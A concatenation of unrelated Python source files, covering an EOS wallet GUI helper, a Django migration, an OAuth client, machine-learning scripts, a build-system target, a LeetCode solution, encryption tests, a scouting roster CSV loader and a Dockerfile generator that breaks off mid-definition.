out = "Could not get but RAM. \n" + str(e)
finally:
app.outputPanel.logger(out)
def stakeNet():
creator = app.tabPanel.accountCreator.get()
owner = app.tabPanel.accountOwner.get()
net = app.tabPanel.net.get()
cpu = app.tabPanel.cpu.get()
# cleos system delegatebw accountname1 accountname2 "1 SYS" "1 SYS"
try:
out = subprocess.run(cleos + ['--url', app.tabPanel.producer.get(), 'system', 'delegatebw', creator, owner, net, cpu],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
print(e)
out = 'Timeout. Can not stake NET\n' + str(e)
except Exception as e:
print(e)
out = "Could not get stake NET. \n" + str(e)
finally:
app.outputPanel.logger(out)
def createAccount():
creator = app.tabPanel.accountCreator.get()
owner = app.tabPanel.accountOwner.get()
activeKey = app.tabPanel.accountActiveKey.get()
ownerKey = app.tabPanel.accountOwnerKey.get()
cpu = app.tabPanel.cpu.get()
net = app.tabPanel.net.get()
ram = app.tabPanel.ram.get()
permission = creator + '@active'
# cleos -u http://IP-HERE:8888 system newaccount --stake-net "0.1000 EOS" --stake-cpu "0.1000 EOS" --buy-ram-kbytes 8 eosio myDesiredAccountName Public key Public key
try:
out = subprocess.run(cleos + ['--url', app.tabPanel.producer.get(), 'system', 'newaccount', creator, owner, ownerKey, activeKey, '--stake-net', net, '--stake-cpu', cpu, '--buy-ram', ram, '--transfer', '-p', permission],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
print(e)
        out = 'Timeout. Can not create account\n' + str(e)
except Exception as e:
print(e)
out = "Could not get stake NET. \n" + str(e)
finally:
app.outputPanel.logger(out)
def setWalletDir():
stop = stopKeosd(False)
run = runKeosd(False)
app.outputPanel.logger(stop + '\n' + run)
def stopKeosd(flag):
if flag:
try:
out = subprocess.run(cleos + ['wallet', 'stop'],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
print(e)
out = 'Timeout. Can not stop keosd\n' + str(e)
except Exception as e:
print(e)
out = "Could not stop keosd. \n" + str(e)
finally:
app.outputPanel.logger(out)
else:
try:
out = subprocess.run(cleos + ['wallet', 'stop'],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
print(e)
out = 'Timeout. Can not stop keosd\n' + str(e)
except Exception as e:
print(e)
out = "Could not stop keosd. \n" + str(e)
finally:
return out
def runKeosd(flag):
# TODO rewrite function
if flag:
try:
out = os.spawnl(os.P_NOWAIT, 'keosd', '--wallet-dir', '~/eosio-wallet')
except Exception as e:
print('Could not run keosd by default path: ' + str(e))
out = "Could not run keosd by default path: " + str(e)
finally:
app.outputPanel.logger(str(out))
else:
try:
out = os.spawnl(os.P_NOWAIT, 'keosd', '--wallet-dir', app.tabPanel.walletDir.get())
except Exception as e:
print('Could not run keosd ' + str(e))
out = "Could not run keosd " + str(e)
finally:
return str(out)
# Currency operations
def getBtcBalance(address):
signal.signal(signal.SIGALRM, handler)
signal.alarm(TIMEOUT)
try:
out = btc.getBalance(address)
except RuntimeError as e:
print(e)
out = 'Can not get BTC balance. Timeout error.\n' + str(e)
except Exception as e:
print(e)
out = 'Can not get BTC balance.\n' + str(e)
finally:
signal.alarm(0)
app.outputPanel.logger(out)
def getEthBalance(address):
signal.signal(signal.SIGALRM, handler)
signal.alarm(TIMEOUT)
try:
out = eth.getBalance(address)
except RuntimeError as e:
print(e)
out = 'Can not get ETH balance. Timeout error.\n' + str(e)
except Exception as e:
print(e)
out = 'Can not get ETH balance.\n' + str(e)
finally:
signal.alarm(0)
app.outputPanel.logger(out)
def getXmrBalance(address):
signal.signal(signal.SIGALRM, handler)
signal.alarm(TIMEOUT)
try:
out = xmr.getBalance(address)
except RuntimeError as e:
print(e)
out = 'Can not get XMR balance. Timeout error.\n' + str(e)
except Exception as e:
print(e)
out = 'Can not get XMR balance.\n' + str(e)
finally:
signal.alarm(0)
app.outputPanel.logger(out)
def getNeoBalance(address):
signal.signal(signal.SIGALRM, handler)
signal.alarm(TIMEOUT)
try:
out = neo.getBalance(address)
except RuntimeError as e:
print(e)
out = 'Can not get NEO balance. Timeout error.\n' + str(e)
except Exception as e:
print(e)
out = 'Can not get NEO balance.\n' + str(e)
finally:
signal.alarm(0)
app.outputPanel.logger(out)
def getLtcBalance(address):
signal.signal(signal.SIGALRM, handler)
signal.alarm(TIMEOUT)
try:
out = ltc.getBalance(address)
except RuntimeError as e:
print(e)
out = 'Can not get LTC balance. Timeout error.\n' + str(e)
except Exception as e:
print(e)
out = 'Can not get LTC balance.\n' + str(e)
finally:
signal.alarm(0)
app.outputPanel.logger(out)
def getBchBalance(address):
signal.signal(signal.SIGALRM, handler)
signal.alarm(TIMEOUT)
try:
out = bch.getBalance(address)
except RuntimeError as e:
print(e)
out = 'Can not get BCH balance. Timeout error.\n' + str(e)
except Exception as e:
print(e)
out = 'Can not get BCH balance.\n' + str(e)
finally:
signal.alarm(0)
app.outputPanel.logger(out)
def getDashBalance(address):
signal.signal(signal.SIGALRM, handler)
signal.alarm(TIMEOUT)
try:
out = dash.getBalance(address)
except RuntimeError as e:
print(e)
out = 'Can not get DASH balance. Timeout error.\n' + str(e)
except Exception as e:
print(e)
out = 'Can not get DASH balance.\n' + str(e)
finally:
signal.alarm(0)
app.outputPanel.logger(out)
|
# Generated by Django 2.2.12 on 2020-06-26 12:53
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('stats', '0019_scenariolanguage_include_keys'),
]
operations = [
migrations.AlterField(
model_name='scenariolanguage',
name='include_keys',
field=models.ManyToManyField(blank=True, help_text='Keys selected here will be used as components of the fragment tuples.', related_name='_scenariolanguage_include_keys_+', to='annotations.LabelKey'),
),
migrations.AlterField(
model_name='scenariolanguage',
name='include_labels',
            field=models.ManyToManyField(blank=True, help_text='Fragments will be included in the scenario only when they are assigned one of the selected labels. Leave empty to include all fragments.', related_name='_scenariolanguage_include_labels_+', to='annotations.Label', verbose_name='Filter by labels'),
),
]
|
import requests
import urllib
from config import setting
from model import user
config = setting.config
class oauthbase(object):
def __init__(self,user=None):
self.set_user(user)
def check_err(self,json):
code = self.str_err_code
msg = self.str_err_msg
name = self.name
if code in json:
if name == "douban" and json[msg].startswith("access_token_has_expired"):
user.update_access_token(name,self.user[name+"_id"],None)
else:
raise Exception(json[msg])
def signed_request(self,method,url,data={}):
if not self._token:
return {}
req = requests.request(method,url,data=data,headers={"Authorization":self.header_str + " "+self._token})
json = req.json()
self.check_err(json)
return json
def signed_post(self,url,data={}):
return self.signed_request("post",url,data=data)
def signed_get(self,url):
return self.signed_request("get",url)
def get_access_token(self,code):
name = self.name
data = {
"client_id":config["auth_"+name+"_key"],
"client_secret":config["auth_"+name+"_secret"],
"redirect_uri":config["auth_"+name+"_callback"],
"grant_type":"authorization_code",
"code":code
}
res_access_token = requests.post(self.access_token_url,data=data)
res_json = res_access_token.json()
try:
self.check_err(res_json)
        except Exception as e:
return str(e)
return res_json["access_token"]
def set_user(self,user):
token_name = self.name + "_access_token"
self.user = user
if user and token_name in user:
self._token = user[token_name]
def redirect(self):
name = self.name
base = self.authorize_url
key = config["auth_"+name+"_key"]
secret = config["auth_"+name+"_secret"]
callback = config["auth_"+name+"_callback"]
qs = urllib.urlencode({"redirect_uri":callback,"client_id":key,"response_type":"code"})
url = base+"?"+qs
return url
|
""" Manage learning from training data and making predictions on test data. """
import logging
__author__ = 'smartschat'
def learn(training_corpus, instance_extractor, perceptron):
""" Learn a model for coreference resolution from training data.
In particular, apply an instance/feature extractor to a training corpus and
employ a machine learning model to learn a weight vector from these
instances.
Args:
training_corpus (Corpus): The corpus to learn from.
        instance_extractor (InstanceExtractor): The instance extractor that
defines the features and the structure of instances that are
extracted during training.
perceptron (Perceptron): A perceptron (including a decoder) that
learns from the instances extracted by ``instance_extractor``.
Returns:
A tuple consisting of
- **priors** (*dict(str,float)*): A prior weight for each label
in the graphs representing the instances,
- **weights** (*dict(str, array)*): A mapping of labels to weight
vectors. For each label ``l``, ``weights[l]`` contains weights
for each feature seen during training (for representing the
features we employ *feature hashing*). If the graphs employed are
not labeled, ``l`` is set to "+".
"""
logging.info("Learning.")
logging.info("\tExtracting instances and features.")
substructures, arc_information = instance_extractor.extract(
training_corpus)
logging.info("\tFitting model parameters.")
perceptron.fit(substructures, arc_information)
return perceptron.get_model()
def predict(testing_corpus,
instance_extractor,
perceptron,
coref_extractor):
""" According to a learned model, predict coreference information.
Args:
testing_corpus (Corpus): The corpus to predict coreference on.
        instance_extractor (InstanceExtractor): The instance extractor that
            defines the features and the structure of instances that are
            extracted during testing.
perceptron (Perceptron): A perceptron learned from training data.
coref_extractor (function): An extractor for consolidating pairwise
predictions into coreference clusters.
Returns:
A tuple containing two dicts. The components are
- **mention_entity_mapping** (*dict(Mention, int)*): A mapping of
mentions to entity identifiers.
- **antecedent_mapping** (*dict(Mention, Mention)*): A mapping of
mentions to their antecedent (as determined by the
``coref_extractor``).
"""
logging.info("Predicting.")
logging.info("\tRemoving coreference annotations from corpus.")
for doc in testing_corpus:
doc.antecedent_decisions = {}
for mention in doc.system_mentions:
mention.attributes["antecedent"] = None
mention.attributes["set_id"] = None
logging.info("\tExtracting instances and features.")
substructures, arc_information = instance_extractor.extract(testing_corpus)
logging.info("\tDoing predictions.")
arcs, labels, scores = perceptron.predict(substructures, arc_information)
logging.info("\tClustering results.")
return coref_extractor(arcs, labels, scores, perceptron.get_coref_labels())
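# Example workflow (a sketch, not part of the original module; the corpus, extractor,
# perceptron and coref_extractor objects are assumed to be constructed elsewhere):
#
#   priors, weights = learn(training_corpus, instance_extractor, perceptron)
#   mention_entity_mapping, antecedent_mapping = predict(
#       testing_corpus, instance_extractor, perceptron, coref_extractor)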
|
import torch
import numpy as np
from tme6 import CirclesData
from torch.autograd import Variable
def loss_accuracy(Yhat, Y):
L = - torch.mean(Y * torch.log(Yhat))
_, indYhat = torch.max(Yhat, 1)
_, indY = torch.max(Y, 1)
acc = torch.sum(indY == indYhat) #* 100 / indY.size(0);
acc = float(acc.data[0]) * 100./indY.size(0)
return L, acc
def init_params_auto(nx, nh, ny):
params = {}
params['Wh'] = Variable(torch.randn(nh, nx), requires_grad=True)
params['bh'] = Variable(torch.zeros(nh, 1), requires_grad=True)
params['Wy'] = Variable(torch.randn(ny, nh) * 0.3, requires_grad=True)
params['by'] = Variable(torch.zeros(ny, 1),requires_grad=True)
return params
def forward(params, X):
bsize = X.size(0)
nh = params['Wh'].size(0)
ny = params['Wy'].size(0)
outputs = {}
outputs['X'] = X
outputs['htilde'] = torch.mm(X, params['Wh'].t()) + params['bh'].t().expand(bsize, nh)
outputs['h'] = torch.tanh(outputs['htilde'])
outputs['ytilde'] = torch.mm(outputs['h'], params['Wy'].t()) + params['by'].t().expand(bsize, ny)
outputs['yhat'] = torch.exp(outputs['ytilde'])
outputs['yhat'] = outputs['yhat'] / (outputs['yhat'].sum(1, keepdim=True)).expand_as(outputs['yhat'])
return outputs['yhat'], outputs
def sgd(params, eta=0.05):
    params['Wy'].data -= eta * params['Wy'].grad.data
    params['Wh'].data -= eta * params['Wh'].grad.data
    params['by'].data -= eta * params['by'].grad.data
    params['bh'].data -= eta * params['bh'].grad.data
    # zero the gradients after the update; .backward() accumulates them otherwise
    for key in params:
        params[key].grad.data.zero_()
    return params
data = CirclesData()
data.plot_data()
# init
N = data.Xtrain.shape[0]
Nbatch = 20
nx = data.Xtrain.shape[1]
nh = 10
ny = data.Ytrain.shape[1]
eps = 30
params = init_params_auto(nx, nh, ny)
for iteration in range(20):
perm = torch.randperm(N)
Xtrain = data.Xtrain[perm]
Ytrain = data.Ytrain[perm]
# batches
for j in range(N // Nbatch):
X = Xtrain[perm[j * Nbatch:(j+1) * Nbatch]]
Y = Ytrain[perm[j * Nbatch:(j+1) * Nbatch]]
Yhat, outputs = forward(params, Variable(X, requires_grad=False))
L, _ = loss_accuracy(Yhat, Variable(Y, requires_grad=False))
L.backward()
params = sgd(params, 0.03)
Yhat_train, _ = forward(params, Variable(data.Xtrain, requires_grad=False))
Yhat_test, _ = forward(params, Variable(data.Xtest, requires_grad=False))
Ltrain, acctrain = loss_accuracy(Yhat_train, Variable(data.Ytrain, requires_grad=False))
Ltest, acctest = loss_accuracy(Yhat_test, Variable(data.Ytest, requires_grad=False))
Ygrid, _ = forward(params, Variable(data.Xgrid, requires_grad=False))
title = 'Iter {}: Acc train {:.1f}% ({:.2f}), acc test {:.1f}% ({:.2f})'.format(iteration, acctrain, Ltrain.data[0], acctest, Ltest.data[0])
#print(title)
data.plot_data_with_grid(Ygrid.data, title)
L_train = Ltrain.data[0]
L_test = Ltest.data[0]
data.plot_loss((Ltrain.data[0]), (Ltest.data[0]), acctrain, acctest)
#
|
from pattern_model import Model
SIM_STEP = 0.01
STEPS_PER_FRAME = 20
model = Model(
neuron_count = 100
)
try :
import imp
imp.find_module( "matplotlib" )
from matplotlib import pyplot as plt
from matplotlib import animation
figure = plt.figure()
figure.suptitle( "Model" )
model_plot = figure.add_subplot( 211 )
model_plot.set_ylim( -1.0, 1.0 )
model_plot.grid( True )
input_line, = model_plot.plot( [], [] )
pattern_line, = model_plot.plot( [], [] )
output_plot = figure.add_subplot( 212 )
output_plot.set_ylim( -1.0, 1.0 )
output_plot.grid( True )
train_output_line, = output_plot.plot( [], [] )
output_line, = output_plot.plot( [], [] )
time_data = []
input_data = []
pattern_data = []
train_output_data = []
output_data = []
def animate_model( frame ) :
for i in range( STEPS_PER_FRAME ) :
model.step( SIM_STEP )
time_data.append( model.time )
input_data.append( model.input )
pattern_data.append( model.pattern.value )
train_output_data.append( model.train_output )
output_data.append( model.output )
input_line.set_data( time_data, input_data )
pattern_line.set_data( time_data, pattern_data )
train_output_line.set_data( time_data, train_output_data )
output_line.set_data( time_data, output_data )
model_plot.set_xlim( model.time - 1.0, model.time + 0.1 )
output_plot.set_xlim( model.time - 1.0, model.time + 0.1 )
model_animation = animation.FuncAnimation( figure, animate_model,
interval=30 )
plt.show()
except ImportError :
while True :
model.step( SIM_STEP )
|
# Copyright (c) 2016 Tencent Inc.
# All rights reserved.
#
# Author: Li Wenting <wentingli@tencent.com>
# Date: April 18, 2016
"""
This is the package target module which packages files
into a (possibly compressed) archive.
"""
from __future__ import absolute_import
import os
from blade import build_manager
from blade import build_rules
from blade.blade_util import var_to_list
from blade.target import Target, LOCATION_RE
_package_types = frozenset([
'tar',
'tar.gz',
'tgz',
'tar.bz2',
'tbz',
'zip',
])
class PackageTarget(Target):
"""
This class is used to pack files into an archive which could be
compressed using gzip or bz2 according to the package type.
"""
def __init__(self,
name,
srcs,
deps,
visibility,
type,
out,
shell,
kwargs):
srcs = var_to_list(srcs)
deps = var_to_list(deps)
super(PackageTarget, self).__init__(
name=name,
type='package',
srcs=[],
deps=deps,
visibility=visibility,
kwargs=kwargs)
if type not in _package_types:
self.error('Invalid type %s. Types supported by the package are %s' % (
type, ', '.join(sorted(_package_types))))
self.attr['type'] = type
self.attr['sources'] = []
self.attr['locations'] = []
self._process_srcs(srcs)
if not out:
out = '%s.%s' % (name, type)
self.attr['out'] = out
self.attr['shell'] = shell
def _process_srcs(self, srcs):
"""
Process sources which could be regular files, directories or
location references.
"""
for s in srcs:
if isinstance(s, tuple):
src, dst = s
elif isinstance(s, str):
src, dst = s, ''
else:
self.error('Invalid src %s. src should be either str or tuple.' % s)
continue
m = LOCATION_RE.search(src)
if m:
self._add_location_reference(m, dst)
else:
self._add_package_source(src, dst)
def _add_location_reference(self, m, dst):
"""Add target location reference."""
key, type = self._add_location_reference_target(m)
self.attr['locations'].append((key, type, dst))
def _get_source_path(self, src, dst):
"""
Return src full path within the workspace and mapping path in the archive.
"""
if '..' in src or '..' in dst:
self.error('Invalid src (%s, %s). Relative path is not allowed.' % (src, dst))
if src.startswith('//'):
src = src[2:]
path = src
else:
path = self._source_file_path(src)
if not dst:
dst = src
return path, dst
def _add_package_source(self, src, dst):
"""Add regular file or directory."""
src, dst = self._get_source_path(src, dst)
if not os.path.exists(src):
self.error('Package source %s does not exist.' % src)
elif os.path.isfile(src):
self.attr['sources'].append((src, dst))
else:
for dir, subdirs, files in os.walk(src):
# Skip over subdirs starting with '.', such as .svn
subdirs[:] = [d for d in subdirs if not d.startswith('.')]
for f in files:
f = os.path.join(dir, f)
rel_path = os.path.relpath(f, src)
self.attr['sources'].append((f, os.path.join(dst, rel_path)))
def ninja_rules(self):
inputs, entries = [], []
for src, dst in self.attr['sources']:
inputs.append(src)
entries.append(dst)
targets = self.blade.get_build_targets()
for key, type, dst in self.attr['locations']:
path = targets[key]._get_target_file(type)
if not path:
self.warning('Location %s %s is missing. Ignored.' % (key, type))
continue
if not dst:
dst = os.path.basename(path)
inputs.append(path)
entries.append(dst)
output = self._target_file_path(self.attr['out'])
if not self.attr['shell']:
self.ninja_build('package', output, inputs=inputs,
variables={'entries': ' '.join(entries)})
else:
self._package_in_shell(output, inputs, entries)
@staticmethod
def _rule_from_package_type(t):
if t == 'zip':
return 'package_zip'
return 'package_tar'
@staticmethod
def tar_flags(t):
return {
'tar': '',
'tar.gz': '-z',
'tgz': '-z',
'tar.bz2': '-j',
'tbz': '-j',
}[t]
def _package_in_shell(self, output, inputs, entries):
packageroot = self._target_file_path(self.name + '.sources')
package_sources = []
for src, dst in zip(inputs, entries):
dst = os.path.join(packageroot, dst)
self.ninja_build('copy', dst, inputs=src)
package_sources.append(dst)
vars = {
'entries': ' '.join(entries),
'packageroot': packageroot,
}
type = self.attr['type']
rule = self._rule_from_package_type(type)
if type != 'zip':
vars['tarflags'] = self.tar_flags(type)
self.ninja_build(rule, output, inputs=package_sources, variables=vars)
def package(name=None,
srcs=[],
deps=[],
visibility=None,
type='tar',
out=None,
shell=False,
**kwargs):
package_target = PackageTarget(
name=name,
srcs=srcs,
deps=deps,
visibility=visibility,
type=type,
out=out,
shell=shell,
kwargs=kwargs)
build_manager.instance.register_target(package_target)
build_rules.register_function(package)
|
"""872. Leaf-Similar Trees
https://leetcode.com/problems/leaf-similar-trees/
Consider all the leaves of a binary tree, from left to right order, the
values of those leaves form a leaf value sequence.
For example, in the given tree above, the leaf value sequence is (6, 7, 4, 9,
8).
Two binary trees are considered leaf-similar if their leaf value sequence is
the same.
Return true if and only if the two given trees with head nodes root1 and
root2 are leaf-similar.
Example 1:
Input: root1 = [3,5,1,6,2,9,8,null,null,7,4],
root2 = [3,5,1,6,7,4,2,null,null,null,null,null,null,9,8]
Output: true
Example 2:
Input: root1 = [1], root2 = [1]
Output: true
Example 3:
Input: root1 = [1], root2 = [2]
Output: false
Example 4:
Input: root1 = [1,2], root2 = [2,2]
Output: true
Example 5:
Input: root1 = [1,2,3], root2 = [1,3,2]
Output: false
Constraints:
The number of nodes in each tree will be in the range [1, 200].
Both of the given trees will have values in the range [0, 200].
"""
from typing import List
from common.tree_node import TreeNode
class Solution:
def leaf_similar(self, root1: TreeNode, root2: TreeNode) -> bool:
def helper(node: TreeNode, leaf: List[int]):
if not node:
return
if not node.left and not node.right:
leaf.append(node.val)
return
helper(node.left, leaf)
helper(node.right, leaf)
leaf1, leaf2 = [], []
helper(root1, leaf1)
helper(root2, leaf2)
return leaf1 == leaf2
def leaf_similar2(self, root1: TreeNode, root2: TreeNode) -> bool:
def helper(node: TreeNode, leaf: List[int]):
stack = []
while node or stack:
if node:
stack.append(node)
node = node.left
else:
node = stack.pop()
if not node.left and not node.right:
leaf.append(node.val)
node = node.right
leaf1, leaf2 = [], []
helper(root1, leaf1)
helper(root2, leaf2)
return leaf1 == leaf2
def leaf_similar3(self, root1: TreeNode, root2: TreeNode) -> bool:
def helper(node: TreeNode) -> List[int]:
if not node:
return []
if not node.left and not node.right:
return [node.val]
return helper(node.left) + helper(node.right)
return helper(root1) == helper(root2)
def leaf_similar4(self, root1: TreeNode, root2: TreeNode) -> bool:
def helper(nodes: List[TreeNode]) -> int:
while True:
node = nodes.pop()
if node.right:
nodes.append(node.right)
if node.left:
nodes.append(node.left)
if not node.left and not node.right:
return node.val
s1, s2 = [root1], [root2]
while s1 and s2:
if helper(s1) != helper(s2):
return False
return not s1 and not s2
def leaf_similar5(self, root1: TreeNode, root2: TreeNode) -> bool:
def helper(node: TreeNode):
if node:
if not node.left and not node.right:
yield node.val
yield from helper(node.left)
yield from helper(node.right)
return list(helper(root1)) == list(helper(root2))
|
# -*- coding: utf-8 -*-
__all__ = ('collect_functions',)
from typing import Iterator, Collection, List
import ast
from loguru import logger
import asttokens
import astor
from .analysis import PythonFunction
from .util import ast_with_tokens, ast_location
from ..container import ProjectContainer
from ..core import Location, FileLocationRange, LocationRange
from ..functions import ProgramFunctions
def collect_functions(container: ProjectContainer) -> ProgramFunctions:
"""Finds all functions within a Python project given a container."""
logger.debug(f'collecting functions for project [{container.project}]')
visitor = CollectFunctionsVisitor(container)
for filename in container.project.files:
visitor.collect(filename)
return ProgramFunctions(visitor.functions)
class CollectFunctionsVisitor(ast.NodeVisitor):
def __init__(self, container: ProjectContainer) -> None:
super().__init__()
self.atok: asttokens.ASTTokens
self.container = container
self.functions: List[PythonFunction] = []
def visit_FunctionDef(self, node: ast.FunctionDef) -> None:
location = ast_location(self.atok, node)
body_location = ast_location(self.atok, node.body)
function = PythonFunction(name=node.name,
location=location,
body_location=body_location)
logger.debug(f"found function definition: {function}")
self.functions.append(function)
def collect(self, filename: str) -> None:
self.atok = ast_with_tokens(self.container, filename)
project = self.container
logger.debug(f'collecting functions in file {filename} '
f'for project [{project}]')
self.visit(self.atok.tree)
|
from client.utils import encryption
import unittest
class EncryptionTest(unittest.TestCase):
def assertInverses(self, data, padding=None):
key = encryption.generate_key()
ciphertext = encryption.encrypt(data, key, padding)
self.assertTrue(encryption.is_encrypted(ciphertext))
self.assertEqual(
encryption.decrypt(ciphertext, key),
data
)
def encrypt_empty_test(self):
self.assertInverses('')
def encrypt_empty_with_padding_test(self):
self.assertInverses('', 0)
self.assertInverses('', 200)
self.assertInverses('', 800)
def encrypt_non_ascii_test(self):
self.assertInverses('ठीक है अजगर')
def encrypt_non_ascii_with_padding_test(self):
data = 'ίδιο μήκος'
self.assertInverses(data, 200)
self.assertInverses(data, 800)
def encrypt_exact_size_test(self):
self.assertInverses("hi", 2)
self.assertRaises(ValueError, lambda: encryption.encrypt("hi", encryption.generate_key(), 1))
# accented i in sí, longer than 2 characters
self.assertRaises(ValueError, lambda: encryption.encrypt("sí", encryption.generate_key(), 2))
self.assertInverses("hi", 3)
def pad_to_same_size_test(self):
ct1 = encryption.encrypt("hi", encryption.generate_key(), 1000)
ct2 = encryption.encrypt("hi" * 400, encryption.generate_key(), 1000)
self.assertEqual(len(ct1), len(ct2))
def encryption_decryption_fuzz_test(self):
import random
random.seed(0)
for _ in range(100):
data = "".join(random.choice('a-z' + '0-9' + 'A-Z') for _ in range(random.randint(0, 10)))
self.assertInverses(data)
def invalid_key_test(self):
key1 = encryption.generate_key()
key2 = encryption.generate_key()
data = "test data 123"
ciphertext = encryption.encrypt(data, key1)
self.assertTrue(encryption.is_encrypted(ciphertext))
self.assertRaises(encryption.InvalidKeyException, lambda: encryption.decrypt(ciphertext, key2))
def key_characters_test(self):
for _ in range(100):
self.assertRegex(encryption.generate_key(), "^[0-9a-z]+$")
self.assertTrue(encryption.is_valid_key(encryption.generate_key()))
def find_single_key_test(self):
key = encryption.generate_key()
self.assertEqual([key], encryption.get_keys(
"some text some text some text {} some text some text some text".format(key)))
self.assertEqual([key], encryption.get_keys(key))
self.assertEqual([key] * 7, encryption.get_keys(key * 7))
def find_multiple_key_test(self):
key_a, key_b, key_c = [encryption.generate_key() for _ in range(3)]
self.assertEqual([key_a, key_b, key_c], encryption.get_keys(
"Key A: {}, Key B: {}, Key C: {}".format(key_a, key_b, key_c)))
self.assertEqual([key_a, key_c, key_b, key_a], encryption.get_keys(key_a + key_c + key_b + key_a))
|
import csv
from fuzzy_dict import FuzzyDict
import utils
def load_counselors(counselors_file_path, stake):
"""Parse counselors file for counselors in specified stake and return them in a list of parsed csv file rows.
"""
print '\nloading ',counselors_file_path, ' for ', stake, ' stake'
with open(counselors_file_path, 'rb') as f:
# dialect = csv.Sniffer().sniff(f.read(1024))
# f.seek(0)
# reader = csv.reader(f, dialect)
reader = csv.reader(f, delimiter='\t')
if stake == 'all':
viewable_members = [x for x in reader] # Need to remove header row.
else:
viewable_members = [x for x in reader if (str(x[13]) == str(stake))]
return viewable_members
def load_dist_ypt(ypt_file_path):
"""Load district members file from council with Youth Protection Training Dates """
scouters = 0
with open(ypt_file_path, 'rb') as f:
dialect = csv.Sniffer().sniff(f.read(1024))
f.seek(0)
reader = csv.reader(f, dialect)
        dist_members = []
        for row in reader:
            member_ID = row[0]
            stake_name = row[5]
            dist_position = row[45]
# This is to skip the header row
if ( scouters == 0 ):
if ( member_ID != 'Person ID' ):
dist_members.append(row)
scouters += 1
print member_ID
# if this line is a new person, add their record
elif ( member_ID != dist_members[scouters-1][0] ):
dist_members.append(row)
scouters += 1
print member_ID
# This person is already recorded, but only shows district data
# Replace the record, retaining only the district position name
elif len(dist_members[scouters-1][5]):
dist_pos = dist_members[scouters-1][45]
g = dist_members.pop(scouters-1)
dist_members.append(row)
dist_members[scouters-1][45] = dist_pos
# This person has a record in place with only unit position data
# If this line read is a district position, add it to their record
elif (len(dist_position) and (len(dist_members[scouters-1][45]) == 0)):
dist_members[scouters-1][45] = dist_position
return dist_members
def make_fuzzy_comparable_counselor_list(counselors):
"""Format list of parsed csv rows of counselors as list which can be fuzzy compared and return it.
Args:
counselors (list) -- List of parsed csv rows
Returns:
list. Formatted list of dictionaries containing relevant fields for fuzzy comparison::
[
{
last_name: 'Smith',
first_name: 'Jonathan',
street: '1234 Meadow Ln',
emails: {
primary: 'johnsmith@gmail.com',
secondary: 'jsmitty345@hotmail.com'
},
phone: {
work: '1234567890',
home: '1232323242'
}
}
]
"""
fuzzy_list = []
for c in counselors:
counselor_dict = FuzzyDict({
'last_name': c[0],
'first_name': c[1],
'street': c[2],
'city': c[3], # state c[4], and Postal Code c[5] not used
'phones': {
'phone2': utils.normalize_phone_number(c[6]),
'phone1': utils.normalize_phone_number(c[7])
},
'emails': {
'email1': c[8],
'email2': c[9]
},
'Y01': c[10], # Expired date c[11] not used
'Y02': c[12],
'stake': c[13],
'member_ID': c[14], # Active and Show Address checkboxes c[15,16] not used
'note': c[17]
})
# print counselor_dict
fuzzy_list.append(counselor_dict)
return fuzzy_list
def make_fuzzy_comparable_district_list(scouters):
fuzzy_d_list = []
for c in scouters:
if c[0] == 'Person ID ':
print 'skipping header row'
elif len(fuzzy_d_list) and c[0] == fuzzy_d_list[len(fuzzy_d_list)-1]['member_ID']:
print 'skipping duplicate {0} {1}'.format(c[14],c[16])
else:
print 'adding scouter {0} {1}'.format(c[14],c[16])
scouter_dict = FuzzyDict({
'member_ID': c[0],
'first_name': c[14],
'middle_name': c[15],
'last_name': c[16],
# 'full_name': c[14] c[15] c[16],
'age': c[21],
'gender': c[24],
'street': c[29],
'phones': {
'phone1': utils.normalize_phone_number(c[53]),
'phone2': ''
},
'emails': {
'email1': c[87],
'email2': c[88]
},
'stake': utils.stake_ID(c[4]) if len(c[4]) else utils.stake_ID(c[43]),
'ward': c[11],
'unit_number': c[7],
'unit_pos': c[38],
'dist_unit': c[43],
'dist_pos': c[45],
'Y01': c[57],
'Y02': c[58],
'award_name': c[94],
'award_date': c[95],
'MBC_code': c[104],
'MBC_unit_only': c[108]
})
fuzzy_d_list.append(scouter_dict)
return fuzzy_d_list
|
#!/usr/bin/env python3
import argparse
import json
import os
import shutil
import subprocess
import sys
import urllib.parse
import nbformat
import requests
# Simplified representation of a Dockerfile
class Dockerfile(object):
commands = {
'voila': ['voila'],
'nbparameterise': ['nbparameterise'],
'panel': ['panel', 'serve']
}
def __init__(self, mode):
self.base_image = 'nb2dashboard'
self.env = {}
self.labels = {}
self.mode = mode
self.files = []
self.build_commands = []
# Set notebook file
def set_notebook(self, filename):
self.notebook = filename
self.add_file(filename)
# Set an environment variable
def set_env(self, key, value):
self.env[key] = value
# Set a docker image label
def set_label(self, key, value):
self.labels[key] = value
# Add a file to the build
def add_file(self, filename):
self.files.append(filename)
# Add an extra RUN command to the build
def add_build_command(self, command):
self.build_commands.append(command)
# Text of the Dockerfile
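    # Illustrative example of the generated text (actual content depends on the
    # notebook, mode and metadata; the names below are made up):
    #   FROM nb2dashboard
    #   LABEL title="Demo dashboard"
    #   ADD ["demo.ipynb", "/home/jovyan/"]
    #   CMD ["voila", "/home/jovyan/demo.ipynb"]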
def __str__(self):
lines = ['FROM ' + self.base_image, '']
if self.env:
s = ' '.join('{}="{}"'.format(k, v) for k, v in self.env.items())
lines.append('ENV ' + s)
if self.labels:
s = ' '.join('{}="{}"'.format(k, v) for k, v in self.labels.items())
lines.append('LABEL ' + s)
if self.files:
s = ', '.join('"{}"'.format(filename) for filename in self.files)
lines.append('ADD [{}, "/home/jovyan/"]'.format(s))
for command in self.build_commands:
lines.append('RUN ' + command)
lines.append('')
cmd = self.commands[self.mode] + ['/home/jovyan/' + self.notebook]
cmd = ', '.join('"' + x + '"' for x in cmd)
lines.append('CMD [{}]'.format(cmd))
lines.append('')
return "\n".join(lines)
# Stage and build a docker image dashboard from a notebook
class NB2Dashboard(object):
def __init__(self, name, mode):
self.name = name
self.build_dir = 'nb2dashboard-' + name
self.make_build_dir()
self.mode = mode
self.dockerfile = Dockerfile(mode)
self.metadata = {}
# Create build directory (docker context)
def make_build_dir(self):
